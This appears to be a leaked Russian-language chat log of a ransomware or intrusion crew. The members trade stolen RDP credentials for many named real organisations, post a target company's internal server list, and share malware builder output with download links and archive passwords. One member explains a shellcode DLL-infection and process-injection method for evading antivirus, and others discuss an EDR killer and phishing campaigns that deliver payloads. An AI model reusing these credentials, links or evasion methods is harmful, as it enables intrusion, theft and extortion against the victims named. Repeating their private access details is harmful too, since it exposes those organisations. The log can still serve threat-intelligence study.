gbsndpr-ccm001.Rolls-Royce.Local 10.167.39.7 Windows Server 2008 R2 Standard
SG001PR-KMS001.Rolls-Royce.Local 10.224.0.33 Windows Server 2008 R2 Standard
USINDPR-BCA002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERPR-HTA001A.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-BCA001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
EUSMTVPR-QMM003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERDR-AVF002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPP-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-COM001.Rolls-Royce.Local 10.156.0.16 Windows Server 2008 R2 Standard
gbsndpr-bmc001.Rolls-Royce.Local 10.167.39.176 Windows Server 2008 R2 Standard
SG001PR-APP001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-HTA003.Rolls-Royce.Local 10.111.135.40 Windows Server 2008 R2 Standard
DEBERPR-CCM001.Rolls-Royce.Local 10.156.0.14 Windows Server 2008 R2 Standard
```
--------------------
[2024-01-26 13:48:32] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 13:49:25] @lapa:matrix.bestflowers247.online: ну это локальные айпишники
--------------------
[2024-01-26 13:50:19] @lapa:matrix.bestflowers247.online: просто интересно с какого айшиника внешнего пришли они
--------------------
[2024-01-26 13:50:29] @lapa:matrix.bestflowers247.online: т.е. айпишник сотрудника
--------------------
[2024-01-26 13:52:02] @usernamegg:matrix.bestflowers247.online: да, именно, локальные
--------------------
[2024-01-26 13:52:06] @usernamegg:matrix.bestflowers247.online: внешний я не нашел
--------------------
[2024-01-26 13:52:15] @usernamegg:matrix.bestflowers247.online: они еще в квака приходили
--------------------
[2024-01-26 14:03:23] @burito:matrix.bestflowers247.online: ((
--------------------
[2024-01-26 14:03:34] @burito:matrix.bestflowers247.online: ска заепал...
--------------------
[2024-01-26 14:03:35] @sunortla:matrix.bestflowers247.online: > <@muaddib6:matrix.org> конечно. делаю.

И инфецировать не забудь...
--------------------
[2024-01-26 14:03:54] @muaddib6:matrix.org: А ты кто?
--------------------
[2024-01-26 14:22:24] @usernamegg:matrix.bestflowers247.online: это новый криптер у нас.
--------------------
[2024-01-26 14:24:30] @usernamegg:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/goosehead-insurance-agency-llc/103727195
209.235.165.179:3389@CP\ssimmons;Winter2024


https://www.zoominfo.com/c/olo-inc/347829076
34.148.220.87:3389;BLOCKID\Guest;Zrjhysqpe,
BLOCKID\Administrator 1Kosmos123$

https://www.zoominfo.com/c/terawulf-inc/547524286
74.102.41.18:3391;WFMAYS\teacher;Welcome1



https://www.zoominfo.com/c/hirequest-inc/70387466
24.178.69.74:3389@Brian;Br!@n123
ECONOPCSOLUTION\bweinbach
https://104.167.4.223/ui/#/host/vms
root xx13H2XJYejqHrLVftJd


https://www.zoominfo.com/c/the-rmr-group-inc/100500075
67.43.106.183:3375@Jeff;jeff
```
--------------------
[2024-01-26 14:24:56] @usernamezz:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/terawulf-inc/547524286
74.102.41.18:3391;WFMAYS\teacher;Welcome1
```

--------------------
[2024-01-26 14:25:51] @usernamegg:matrix.bestflowers247.online: ```
[17:10:52] сборщик - iso + lnk : Download: https://qaz.im/load/f3k53z/f79e0405-3cde-4b6a-be90-cdb61281d2f0
Delete: https://qaz.im/index.php?a=delete&q=f79e0405-3cde-4b6a-be90-cdb61281d2f0
[17:10:53] сборщик - iso + lnk : KLldksllk432423!!4332___)))
[17:11:02] сборщик - iso + lnk : https://amacey.com/x1g/{random}
[17:11:53] сборщик - iso + lnk : KJJskajksk3231#@)#2!!!
[17:12:01] сборщик - iso + lnk : Download: https://qaz.im/load/DhFYeE/bb30636f-3cf0-451f-8388-3999f8f6ebce
Delete: https://qaz.im/index.php?a=delete&q=bb30636f-3cf0-451f-8388-3999f8f6ebce
[17:12:06] сборщик - iso + lnk : туда же на первый
```
--------------------
[2024-01-26 14:26:48] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> переделаешь ?

Готово.
--------------------
[2024-01-26 14:26:59] @muaddib6:matrix.org: 2.7z
--------------------
[2024-01-26 14:27:07] @muaddib6:matrix.org: TfVdSjzAExoaOjoZMnTlAldcPtzXbqjyYDtHRmWeyuTQtMzXin
--------------------
[2024-01-26 14:27:10] @muaddib6:matrix.org: строка та же.
--------------------
[2024-01-26 14:27:14] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 14:27:21] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> это новый криптер у нас.

Какой-то борзой.
--------------------
[2024-01-26 14:27:23] @usernamegg:matrix.bestflowers247.online: 2.7z
--------------------
[2024-01-26 14:27:26] @usernamegg:matrix.bestflowers247.online: 
TfVdSjzAExoaOjoZMnTlAldcPtzXbqjyYDtHRmWeyuTQtMzXin
строка та же.
--------------------
[2024-01-26 14:27:31] @usernamegg:matrix.bestflowers247.online: новый ехе от бентли
--------------------
[2024-01-26 14:28:30] @usernamegg:matrix.bestflowers247.online: молодой просто ) тут только рабочие моменты плз
--------------------
[2024-01-26 14:28:43] @usernamegg:matrix.bestflowers247.online: не цепляй его
--------------------
[2024-01-26 14:28:49] @usernamegg:matrix.bestflowers247.online: мне не нужна возня в чате общем
--------------------
[2024-01-26 14:29:36] @sunortla:matrix.bestflowers247.online: Он тебе не отписал в личке?
--------------------
[2024-01-26 14:29:43] @usernamegg:matrix.bestflowers247.online: [17:29:29] 2K24 собирает JS: http://91.92.248.152/10.rar

F57RCFT57F56RKF67
--------------------
[2024-01-26 14:29:49] @usernamegg:matrix.bestflowers247.online: вот от этого
--------------------
[2024-01-26 14:30:04] @usernamegg:matrix.bestflowers247.online: ______
[17:29:29] сборщик - iso + lnk : fsldkfsldkfdslkTTETgwewqeyhwjh!!!!
[17:29:31] сборщик - iso + lnk : Download: https://qaz.im/load/HBGyaE/74cffff3-4cf4-4078-a244-17ae85e6bf15
Delete: https://qaz.im/index.php?a=delete&q=74cffff3-4cf4-4078-a244-17ae85e6bf15
[17:29:37] сборщик - iso + lnk : https://terensfood.com/61XblXm/{random}
--------------------
[2024-01-26 14:30:06] @usernamegg:matrix.bestflowers247.online: еще
--------------------
[2024-01-26 14:30:12] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 14:30:14] @usernamegg:matrix.bestflowers247.online: * ______
\[17:29:29\] 2K24 собирает JS: http://91.92.248.152/10.rar

F57RCFT57F56RKF67
--------------------
[2024-01-26 14:30:23] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-26 14:30:45] @sunortla:matrix.bestflowers247.online: В отрицание пошел)
--------------------
[2024-01-26 14:30:48] @usernamegg:matrix.bestflowers247.online: И инфецировать не забудь...
--------------------
[2024-01-26 14:30:55] @usernamegg:matrix.bestflowers247.online: зачем цепляешь его ?
--------------------
[2024-01-26 14:31:06] @sunortla:matrix.bestflowers247.online: Чтоб знал свое место
--------------------
[2024-01-26 14:31:12] @sunortla:matrix.bestflowers247.online: И обманывал тебя
--------------------
[2024-01-26 14:31:20] @sunortla:matrix.bestflowers247.online: и не обманываел*
--------------------
[2024-01-26 14:31:21] @usernamegg:matrix.bestflowers247.online: мне нужна продуктивная работа а не вот это все
--------------------
[2024-01-26 14:31:31] @usernamegg:matrix.bestflowers247.online: все что у вас есть между собой оставьте за кулисами
--------------------
[2024-01-26 14:31:44] @usernamegg:matrix.bestflowers247.online: да, это хорошо что ты есть
--------------------
[2024-01-26 14:31:52] @usernamegg:matrix.bestflowers247.online: он теперь не сделает кривой крипт
--------------------
[2024-01-26 14:31:55] @usernamegg:matrix.bestflowers247.online: ты все увидишь
--------------------
[2024-01-26 14:33:30] @usernamegg:matrix.bestflowers247.online: [17:29:57] 2K24 собирает JS: сделай сразу какие нужно названия чтобы я просто с ними сразу запаковал
--------------------
[2024-01-26 14:36:42] @lapa:matrix.bestflowers247.online: он может сказать просто, как именно он зипует?
--------------------
[2024-01-26 14:36:47] @lapa:matrix.bestflowers247.online: с какими параметрами
--------------------
[2024-01-26 14:36:55] @lapa:matrix.bestflowers247.online: чтобы туда сюда эти файлы не гонять
--------------------
[2024-01-26 14:38:52] @usernameww:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/goosehead-insurance-agency-llc/103727195
209.235.165.179:3389@CP\ssimmons;Winter2024
christpres.org
```

--------------------
[2024-01-26 14:39:41] @lapa:matrix.bestflowers247.online: js26.zip
--------------------
[2024-01-26 14:39:44] @lapa:matrix.bestflowers247.online: pass jksdhfk23424
--------------------
[2024-01-26 14:39:47] @lapa:matrix.bestflowers247.online: подписал
--------------------
[2024-01-26 14:40:27] @usernamegg:matrix.bestflowers247.online: [17:38:30] 2K24 собирает JS: не там не так все просто )
[17:39:35] 2K24 собирает JS: тебе будет проще дать мне чтобы я тебе подписывал и работали с тобой только на подписке
если будем работать на подписке я больше не скем работать не буду
--------------------
[2024-01-26 14:40:48] @usernamegg:matrix.bestflowers247.online: продает себя подороже
--------------------
[2024-01-26 14:41:44] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 14:43:06] @sunortla:matrix.bestflowers247.online: Ок рабочие моменты, так рабочие моменты
--------------------
[2024-01-26 14:43:14] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 14:43:24] @sunortla:matrix.bestflowers247.online: В чате опишу что я делаю
--------------------
[2024-01-26 14:43:24] @lapa:matrix.bestflowers247.online: ну RR через js мы не славили
--------------------
[2024-01-26 14:44:24] @usernamegg:matrix.bestflowers247.online: не нужно
--------------------
[2024-01-26 14:44:30] @usernamegg:matrix.bestflowers247.online: мы главное знаем что ты делаешь
--------------------
[2024-01-26 14:46:38] @lapa:matrix.bestflowers247.online: атачем прошлю его зипы
--------------------
[2024-01-26 14:47:05] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 14:47:19] @usernamegg:matrix.bestflowers247.online: и юсу ту можно подключать
--------------------
[2024-01-26 14:47:54] @usernamegg:matrix.bestflowers247.online: дан говрит шлите по 10 писем и ждите ответа а потом только кидайте нагрузку )
--------------------
[2024-01-26 14:48:01] @usernamegg:matrix.bestflowers247.online: какой тут )
--------------------
[2024-01-26 14:48:47] @sunortla:matrix.bestflowers247.online: Опишу принцип своей работы.
Работаю только пока по shellcode x64.

Беру shellcode x64 и превращаю в dll x64 с указанной точкой входа, в виде функции экспорта, длина которой не более 4 символов.
Пример: rundll32.exe Msg65_n1_x64_inf.dll init /key password123

Принцип работы:
- Внедрение полезной нагрузки в процесс (svchost.exe/explorer.exe)
- Без создания процесса.
- Без создания потока из удаленного процесса.
- Без выделения памяти из удаленного процесса.
- Без записи из удаленного процесса.
- Без чтения из удаленного процесса.
- Без изменения защиты памяти из удаленного процесса.
- Использование прямых системных вызовов, без считывая с диска.
- Ипользование пароля для защиты файла, без которого он не будет работать. (/k password123)
--------------------
[2024-01-26 14:48:48] @lapa:matrix.bestflowers247.online: у нас с 10к нифига не приходит )
--------------------
[2024-01-26 14:49:29] @sunortla:matrix.bestflowers247.online: Спросил как бурито делает, он просто выделяет память в текущем процессе и запускает там полезную нагрузку
--------------------
[2024-01-26 14:49:40] @sunortla:matrix.bestflowers247.online: Ну грубо говоря упаковка
--------------------
[2024-01-26 14:50:19] @sunortla:matrix.bestflowers247.online: Я тоже так делаю, когда не нужно наворотов
--------------------
[2024-01-26 14:50:25] @sunortla:matrix.bestflowers247.online: Это все не обходит ав
--------------------
[2024-01-26 14:50:33] @sunortla:matrix.bestflowers247.online: А дает чистую статику
--------------------
[2024-01-26 14:51:15] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> дан говрит шлите по 10 писем и ждите ответа а потом только кидайте нагрузку )

он тип предлагает слать письмо, ждать ответа от человека, а потом кидать ему файл?
--------------------
[2024-01-26 14:51:41] @lapa:matrix.bestflowers247.online: я кстати тоже похожее делал
--------------------
[2024-01-26 14:51:53] @lapa:matrix.bestflowers247.online: но вот с китами не так все просто
--------------------
[2024-01-26 14:52:18] @lapa:matrix.bestflowers247.online: помню много прослал на них, без нагрузки писем, но всего 6 ответов было
--------------------
[2024-01-26 14:53:30] @usernamegg:matrix.bestflowers247.online: southernwater.co.uk
--------------------
[2024-01-26 14:53:41] @usernamegg:matrix.bestflowers247.online: трее фаил по ним сделай и залей
--------------------
[2024-01-26 14:53:46] @usernamecc:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 14:54:41] @lapa:matrix.bestflowers247.online: поэтому я и прошу сделать бизнес акк на аутлуке, чтобы сидеть пробывать туда слать и смотреть что мне поменять, чтобы инбокс был лучше
--------------------
[2024-01-26 14:56:14] @usernamegg:matrix.bestflowers247.online: есть такое да
--------------------
[2024-01-26 14:56:23] @usernamegg:matrix.bestflowers247.online: в пн будет dll от Ipika бота
--------------------
[2024-01-26 14:56:25] @usernamegg:matrix.bestflowers247.online: посмотрим
--------------------
[2024-01-26 14:56:47] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> он тип предлагает слать письмо, ждать ответа от человека, а потом кидать ему файл?

типа точка работает так
--------------------
[2024-01-26 14:56:57] @sunortla:matrix.bestflowers247.online: Я крипт не делаю.

Крипт - это создание файла и шифровка внутрь поленой нагрузки, от этого я ушел.
Инфецирование - это заражение уже существующего файла, и вшитие туда полезной нагрузки.

Проблема крипта в том, что мы создаем файл через среду разработки, к которой потом ав поставит детект, так как он будет находить паттерны.
А инфецирование, мы взяли файл длл, заразили shellcode, вшили полезную нагрузку и вот вам новый файл, вязать как правило будут к шелкоду.

Так или иначе, я единственный кто это делает.
--------------------
[2024-01-26 14:57:12] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> поэтому я и прошу сделать бизнес акк на аутлуке, чтобы сидеть пробывать туда слать и смотреть что мне поменять, чтобы инбокс был лучше

я пока не занимался этим
--------------------
[2024-01-26 14:59:33] @usernamecc:matrix.bestflowers247.online: ```
SWS tree
http://temp.sh/jpfqG/xur9nzTXUp7J4MBD3wmdFhWGQgHq.zip
xur9nzTXUp7J4MBD3wmdFhWGQgHq.zip
extract pass: qKXuZznB5QE8RdFgv4WDN6tM9ASk
```
--------------------
[2024-01-26 14:59:37] @usernamegg:matrix.bestflowers247.online: да да
--------------------
[2024-01-26 15:00:27] @sunortla:matrix.bestflowers247.online: Этот метод крутой и сложный, многий софт будет тупо ломаться.
А знаешь почему?

Потому что софт спроектирован так, что он думает, что процесс его и он может делать что хочешь.
А при инжектах, процесс не является его, он там сидит как паразит, но при этом думает что он главный.
Поэтому он может легко упасть и убить своего носителя, так как он не знает где он находится.

С шелкодами проще, шелкод расчитан на то что он будет запущен в процессе.
--------------------
[2024-01-26 15:02:03] @sunortla:matrix.bestflowers247.online: Поэтому все крипторы делают, запуск в текущем процессе, что бы софт был главным, и понимал что это его процесс.
--------------------
[2024-01-26 15:04:22] @lapa:matrix.bestflowers247.online: в пн тогда прошлю на эти точки просто письма без нагрузки
--------------------
[2024-01-26 15:04:26] @lapa:matrix.bestflowers247.online: и посмотрю будут ли ответы
--------------------
[2024-01-26 15:08:11] @lapa:matrix.bestflowers247.online: он еще зипует?
--------------------
[2024-01-26 15:15:57] @usernameww:matrix.bestflowers247.online: 
```
https://www.zoominfo.com/c/goosehead-insurance-agency-llc/103727195
209.235.165.179:3389@CP\ssimmons;Winter2024
christpres.org church
есть траст
cpalions.org  Пресвитерианская академия Христа
na compe sentinel one


https://www.zoominfo.com/c/olo-inc/347829076
34.148.220.87:3389;BLOCKID\Guest;Zrjhysqpe,
BLOCKID\Administrator 1Kosmos123$
kredi ne verni

https://www.zoominfo.com/c/terawulf-inc/547524286
74.102.41.18:3391;WFMAYS\teacher;Welcome1
8pc 1 srv

https://www.zoominfo.com/c/hirequest-inc/70387466
24.178.69.74:3389@Brian;Br!@n123
ECONOPCSOLUTION\bweinbach
https://104.167.4.223/ui/#/host/vms
root xx13H2XJYejqHrLVftJd
5pc domen ne sootvetstvuet zayavlenomu


https://www.zoominfo.com/c/the-rmr-group-inc/100500075
67.43.106.183:3375@Jeff;jeff
8M domen ne sootvetstvuet zayavlenomu
www.ravenindustries.com
4srv pinguutsya (melkaya)
```
--------------------
[2024-01-26 15:16:19] @usernameww:matrix.bestflowers247.online: * ```
https://www.zoominfo.com/c/goosehead-insurance-agency-llc/103727195
209.235.165.179:3389@CP\ssimmons;Winter2024
christpres.org church
есть траст
cpalions.org  Пресвитерианская академия Христа
na  pc sentinel one


https://www.zoominfo.com/c/olo-inc/347829076
34.148.220.87:3389;BLOCKID\Guest;Zrjhysqpe,
BLOCKID\Administrator 1Kosmos123$
kredi ne verni

https://www.zoominfo.com/c/terawulf-inc/547524286
74.102.41.18:3391;WFMAYS\teacher;Welcome1
8pc 1 srv

https://www.zoominfo.com/c/hirequest-inc/70387466
24.178.69.74:3389@Brian;Br!@n123
ECONOPCSOLUTION\bweinbach
https://104.167.4.223/ui/#/host/vms
root xx13H2XJYejqHrLVftJd
5pc domen ne sootvetstvuet zayavlenomu


https://www.zoominfo.com/c/the-rmr-group-inc/100500075
67.43.106.183:3375@Jeff;jeff
8M domen ne sootvetstvuet zayavlenomu
www.ravenindustries.com
4srv pinguutsya (melkaya)
```
--------------------
[2024-01-26 15:22:45] @sunortla:matrix.bestflowers247.online: В идеале нужно создать группу по Shellcode, чтоб не было каши.
Второе, в открытую передавать файлы тоже глупо, ведь ничего не мешает этой крысе их сливать.
Ведь он даже замотивирован это делать, поэтому нужны пароли и архивы.

--------------------
[2024-01-26 15:26:34] @lapa:matrix.bestflowers247.online: у дана что-то панель не работает
--------------------
[2024-01-26 15:43:13] @chuck:talks.icu: слух, а ты щас прослал?
--------------------
[2024-01-26 15:43:34] @chuck:talks.icu: у меня две новых суперноды дружно ушли в блек
--------------------
[2024-01-26 15:48:34] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2024-01-26 15:48:38] @usernamegg:matrix.bestflowers247.online: у меня работало
--------------------
[2024-01-26 15:50:01] @lapa:matrix.bestflowers247.online: да, уже работает
--------------------
[2024-01-26 15:50:27] @usernamegg:matrix.bestflowers247.online: я прослал по RR сетке
--------------------
[2024-01-26 15:50:35] @usernamegg:matrix.bestflowers247.online: 200 почт ушло
--------------------
[2024-01-26 15:51:34] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-26 в 18.51.08.png
--------------------
[2024-01-26 15:51:36] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-26 в 18.51.12.png
--------------------
[2024-01-26 15:51:49] @chuck:talks.icu: ппц быстро раскрутили
--------------------
[2024-01-26 15:51:57] @chuck:talks.icu: понял
--------------------
[2024-01-26 15:54:38] @usernamenn:matrix.bestflowers247.online: какой крысе?
--------------------
[2024-01-26 15:54:54] @usernamenn:matrix.bestflowers247.online: 🐀
--------------------
[2024-01-26 15:55:06] @usernamegg:matrix.bestflowers247.online: он бентли ненавидит
--------------------
[2024-01-26 15:55:29] @usernamenn:matrix.bestflowers247.online: а ну он знает получается что он тут в группе
--------------------
[2024-01-26 15:55:44] @lapa:matrix.bestflowers247.online: что-то он долго зипы делает
--------------------
[2024-01-26 15:56:14] @usernamegg:matrix.bestflowers247.online: [17:41:56] 2K24 собирает JS: ок, какое делать название файлам?
--------------------
[2024-01-26 15:56:19] @usernamegg:matrix.bestflowers247.online: он не делает ждем названия
--------------------
[2024-01-26 15:56:23] @usernamegg:matrix.bestflowers247.online: как оказалось
--------------------
[2024-01-26 15:56:57] @lapa:matrix.bestflowers247.online: бен разницы
--------------------
[2024-01-26 15:56:59] @lapa:matrix.bestflowers247.online: я переименую
--------------------
[2024-01-26 15:57:14] @lapa:matrix.bestflowers247.online: рандом от 2 до 5 символов
--------------------
[2024-01-26 15:57:40] @usernamegg:matrix.bestflowers247.online: ```
[17:53:15] сборщик - iso + lnk : JKJJfjsdfjkjdkkl5o43ndadsmn8888%%^%
[17:53:15] сборщик - iso + lnk : Download: https://qaz.im/load/9FEb74/be738b31-74e4-4d37-9ecd-93dda509bc64
Delete: https://qaz.im/index.php?a=delete&q=be738b31-74e4-4d37-9ecd-93dda509bc64
[17:53:21] сборщик - iso + lnk : также первый
[17:53:24] сборщик - iso + lnk : ой
[17:53:30] сборщик - iso + lnk : второй!!! https://terensfood.com/61XblXm/{random}
[17:58:21] сборщик - iso + lnk : msi_url_d3_p1KJSksjdajdkjsjas32321!!
[17:58:22] сборщик - iso + lnk : Download: https://qaz.im/load/fNkbky/cb7ae282-346a-4c99-9f44-de25237c05c3
Delete: https://qaz.im/index.php?a=delete&q=cb7ae282-346a-4c99-9f44-de25237c05c3
[17:58:27] сборщик - iso + lnk : https://terripost.com/ftxK/{random}
[18:06:25] сборщик - iso + lnk : JKJJKjdksjdkj30ldgjdhgkcncxz,cxjq3!!@
[18:11:11] сборщик - iso + lnk : Download: https://qaz.im/load/QdDNiz/e7b17ab2-1e87-4b50-b109-e42bceea56ef
Delete: https://qaz.im/index.php?a=delete&q=e7b17ab2-1e87-4b50-b109-e42bceea56ef
```
--------------------
[2024-01-26 15:57:44] @usernamegg:matrix.bestflowers247.online: от него смотрел фаил ?
--------------------
[2024-01-26 15:58:02] @lapa:matrix.bestflowers247.online: там msi
--------------------
[2024-01-26 15:58:09] @lapa:matrix.bestflowers247.online: атачем оно врядли зайдет
--------------------
[2024-01-26 15:58:36] @lapa:matrix.bestflowers247.online: да и эти js в зипе тоже не факт, что норм буду заходить
--------------------
[2024-01-26 15:59:15] @lapa:matrix.bestflowers247.online: у меня кстати уже вакатак на его js
--------------------
[2024-01-26 15:59:30] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 15:59:30] @lapa:matrix.bestflowers247.online: посмотрим будет ли у его зипов такое же
--------------------
[2024-01-26 16:00:09] @usernamegg:matrix.bestflowers247.online: ```
https://ibb.co/Y8phr0B
This is for Sophos.
I have 2 versions of killer
One is that I mentioned before.
Another one includes also Sophos, TrendMicro and others.
Cob Meta: What the fuck are you talking? Last time when you paid and there was some problem with this killer I refunded you the money. Doesn't matter. See video that you so much need.
```
--------------------
[2024-01-26 16:00:19] @usernamegg:matrix.bestflowers247.online: EDR killer
--------------------
[2024-01-26 16:00:22] @usernamegg:matrix.bestflowers247.online: https://ibb.co/Y8phr0B
--------------------
[2024-01-26 16:00:42] @lapa:matrix.bestflowers247.online: но на exe все равно вакатак
--------------------
[2024-01-26 16:01:05] @lapa:matrix.bestflowers247.online: проверил по старому файлу js
--------------------
[2024-01-26 16:04:30] @usernamegg:matrix.bestflowers247.online: [18:58:35] 2K24 собирает JS: Я же тебе говорил что нужно что бы я упаковал
[19:01:31] 2K24 собирает JS: говори как делать
--------------------
[2024-01-26 16:04:57] @lapa:matrix.bestflowers247.online: ну, жду
--------------------
[2024-01-26 16:10:49] @lapa:matrix.bestflowers247.online: он там пакует?
--------------------
[2024-01-26 16:20:37] @usernamegg:matrix.bestflowers247.online: [19:19:55] 2K24 собирает JS: http://91.92.248.152/js26.rar

F57RCFT57F56RKF67
--------------------
[2024-01-26 16:20:49] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 16:20:55] @lapa:matrix.bestflowers247.online: атачем слать?
--------------------
[2024-01-26 16:21:52] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 16:21:57] @usernamegg:matrix.bestflowers247.online: лучше аттачем думаю
--------------------
[2024-01-26 16:22:06] @usernamegg:matrix.bestflowers247.online: я могу прослать еще 100?
--------------------
[2024-01-26 16:22:19] @lapa:matrix.bestflowers247.online: ну проверить не могу, как они в аутлук заходят
--------------------
[2024-01-26 16:22:19] @usernamegg:matrix.bestflowers247.online: у него две ноды там отвалились
--------------------
[2024-01-26 16:22:32] @usernamegg:matrix.bestflowers247.online: chuck
слух, а ты щас прослал?
у меня две новых суперноды дружно ушли в блек
--------------------
[2024-01-26 16:22:41] @chuck:talks.icu: по одной сетке тоже?
--------------------
[2024-01-26 16:22:42] @usernamegg:matrix.bestflowers247.online: chuck
ппц быстро раскрутили
понял
--------------------
[2024-01-26 16:22:46] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 16:22:48] @usernamegg:matrix.bestflowers247.online: все она
--------------------
[2024-01-26 16:22:53] @usernamegg:matrix.bestflowers247.online: билд рабочий
--------------------
[2024-01-26 16:22:56] @usernamegg:matrix.bestflowers247.online: сколько там супер нод ?
--------------------
[2024-01-26 16:23:01] @chuck:talks.icu: ок давай
--------------------
[2024-01-26 16:23:15] @chuck:talks.icu: но там 1 супернода
--------------------
[2024-01-26 16:23:22] @lapa:matrix.bestflowers247.online: понял
--------------------
[2024-01-26 16:23:25] @chuck:talks.icu: из живых
--------------------
[2024-01-26 16:23:30] @lapa:matrix.bestflowers247.online: видимо да, раскрутили
--------------------
[2024-01-26 16:25:08] @lapa:matrix.bestflowers247.online: так
--------------------
[2024-01-26 16:25:17] @lapa:matrix.bestflowers247.online: что-то подпись не валидная
--------------------
[2024-01-26 16:25:41] @lapa:matrix.bestflowers247.online: exe короч палит
--------------------
[2024-01-26 16:25:54] @lapa:matrix.bestflowers247.online: думаю не стоит слать
--------------------
[2024-01-26 16:26:36] @lapa:matrix.bestflowers247.online: странно, невалидная подпись у js
--------------------
[2024-01-26 16:28:40] @lapa:matrix.bestflowers247.online: другой файл проверил
--------------------
[2024-01-26 16:28:43] @lapa:matrix.bestflowers247.online: тоже самое
--------------------
[2024-01-26 16:42:14] @lapa:matrix.bestflowers247.online: прошлю прогревочные по этим юсовским
--------------------
[2024-01-26 16:42:18] @lapa:matrix.bestflowers247.online: посмотрю ответит ли кто
--------------------
[2024-01-26 16:51:56] @usernamegg:matrix.bestflowers247.online: ```
89.213.29.72:3389;CBSSOUTH\Guest;Zrjhysqpe,062

191.239.253.220:3389;RECORDNEWS\Guest;Zrjhysqpe,059

203.159.154.103:3389;EXT-DNS-2\Guest;Zrjhysqpe,700

213.202.255.116:3389;VPS1790516\Guest;Zrjhysqpe,234

213.136.71.228:3389;VMI165934\Guest;Zrjhysqpe,179

179.33.138.235:3389;ZARAGOZASAS\Guest;Zrjhysqpe,414

154.73.52.18:3389;PETRO-AIR\Guest;Zrjhysqpe,509

81.42.225.176:3389;SERVIDOR\Guest;Zrjhysqpe,135

191.189.174.236:3389;MAXIMO\Guest;Zrjhysqpe

186.81.116.82:3389;MAINDOMAINX1\Guest;Zrjhysqpe,876

80.58.162.195:3389;DYD\Guest;Zrjhysqpe,286

49.13.86.185:3389;KERBEROS\Guest;Zrjhysqpe,876
```






--------------------
[2024-01-26 16:53:32] @lapa:matrix.bestflowers247.online: если будут ответы, в пн в ответ им файл отправлю
--------------------
[2024-01-26 16:53:58] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 16:54:28] @usernamezz:matrix.bestflowers247.online: `191.239.253.220:3389;RECORDNEWS\Guest;Zrjhysqpe,059`
--------------------
[2024-01-26 16:54:38] @usernameww:matrix.bestflowers247.online: 89.213.29.72:3389;CBSSOUTH\Guest;Zrjhysqpe,062
zabral
--------------------
[2024-01-26 16:54:43] @usernameww:matrix.bestflowers247.online: * `89.213.29.72:3389;CBSSOUTH\\Guest;Zrjhysqpe,062
zabral`
--------------------
[2024-01-26 16:55:43] @usernameww:matrix.bestflowers247.online: ```
203.159.154.103:3389;EXT-DNS-2\Guest;Zrjhysqpe,700
zabral
```

--------------------
[2024-01-26 16:58:23] @usernamett:matrix.bestflowers247.online: ```
213.202.255.116:3389;VPS1790516\Guest;Zrjhysqpe,234
zabral
```
--------------------
[2024-01-26 17:00:05] @usernamett:matrix.bestflowers247.online: ```
213.136.71.228:3389;VMI165934\Guest;Zrjhysqpe,179
zabral
```
--------------------
[2024-01-26 17:01:08] @lapa:matrix.bestflowers247.online: 10к отправил... завтра посмотрю сколько ответят
--------------------
[2024-01-26 17:01:18] @usernamett:matrix.bestflowers247.online: ```
154.73.52.18:3389;PETRO-AIR\Guest;Zrjhysqpe,509
zabral
```
--------------------
[2024-01-26 17:02:05] @lapa:matrix.bestflowers247.online: офнусь. до понедельника
--------------------
[2024-01-26 17:17:20] @usernameww:matrix.bestflowers247.online: ```
89.213.29.72:3389;CBSSOUTH\Guest;Zrjhysqpe,062
kredi ne verni

191.239.253.220:3389;RECORDNEWS\Guest;Zrjhysqpe,059
BRAZIL

203.159.154.103:3389;EXT-DNS-2\Guest;Zrjhysqpe,700
ne set' (out of domain)

213.202.255.116:3389;VPS1790516\Guest;Zrjhysqpe,234
kredi ne verni

213.136.71.228:3389;VMI165934\Guest;Zrjhysqpe,179
kredi ne verni

179.33.138.235:3389;ZARAGOZASAS\Guest;Zrjhysqpe,414
disable account


154.73.52.18:3389;PETRO-AIR\Guest;Zrjhysqpe,509
disable account

81.42.225.176:3389;SERVIDOR\Guest;Zrjhysqpe,135
no connect

191.189.174.236:3389;MAXIMO\Guest;Zrjhysqpe
no connect

186.81.116.82:3389;MAINDOMAINX1\Guest;Zrjhysqpe,876
1 srv 2pc (melkaya, no trust)

80.58.162.195:3389;DYD\Guest;Zrjhysqpe,286
disable account

49.13.86.185:3389;KERBEROS\Guest;Zrjhysqpe,876
1 srv 1pc (melkaya, no trust) (domain kerberos - revers !!!!!)
```

--------------------
[2024-01-26 17:19:27] @usernamegg:matrix.bestflowers247.online: да
--------------------
